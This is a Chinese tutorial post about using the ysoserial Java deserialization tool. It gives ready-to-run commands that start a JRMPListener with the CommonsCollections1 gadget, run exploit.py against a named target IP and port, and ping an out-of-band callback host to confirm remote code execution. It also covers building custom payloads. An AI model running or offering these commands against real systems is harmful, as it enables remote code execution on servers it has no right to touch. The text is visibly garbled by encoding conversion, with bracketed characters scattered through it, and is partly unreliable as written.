溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

反序列化工具ysoserial使用介紹

發(fā)布時(shí)間:2020-07-08 04:49:17 來(lái)源:網(wǎng)絡(luò) 閱讀:79438 作者:wx5b0b88843cb2a 欄目:安全技術(shù)

反序列化工具ysoserial使用介紹

0x00 ysoserial是什么?

ysoserial集合了各種java反序列化payload;
下載地址:https://github.com/angelwhu/ysoserial

0x01 基本使用方法

在公網(wǎng)vps上執(zhí)行:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener  【port】 CommonsCollections1 '【commands】'

port:公網(wǎng)vps上監(jiān)聽(tīng)的端口號(hào)
commands:需要執(zhí)行的命令
例子:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 2  rce.267hqw.ceye.io'

重啟一個(gè)shell窗口:

python exploit.py 【目標(biāo)ip】 【目標(biāo)端口】 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 【JRMPListener ip】  【JRMPListener port】 JRMPClient

列子:

python exploit.py 118.89.53.139  7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 118.89.53.139  1099 JRMPClient

0x02 在ysoserial編寫(xiě)自己的payload

  1. git clone https://github.com/fanyingjie2/ysoserial.git
  2. 將自己編寫(xiě)的payload放在下載的包中:路徑y(tǒng)soserial/src/main/java/ysoserial/payloads/
  3. 修改Dockerfile
    反序列化工具ysoserial使用介紹
  4. docker build -t ysoserial .
  5. docker run -ti ID號(hào) /bin/bash
  6. 在docke中執(zhí)行 apt-get update
  7. 在docker中執(zhí)行apt-get install lrzsz
  8. sz target/ysoserial.jar
向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI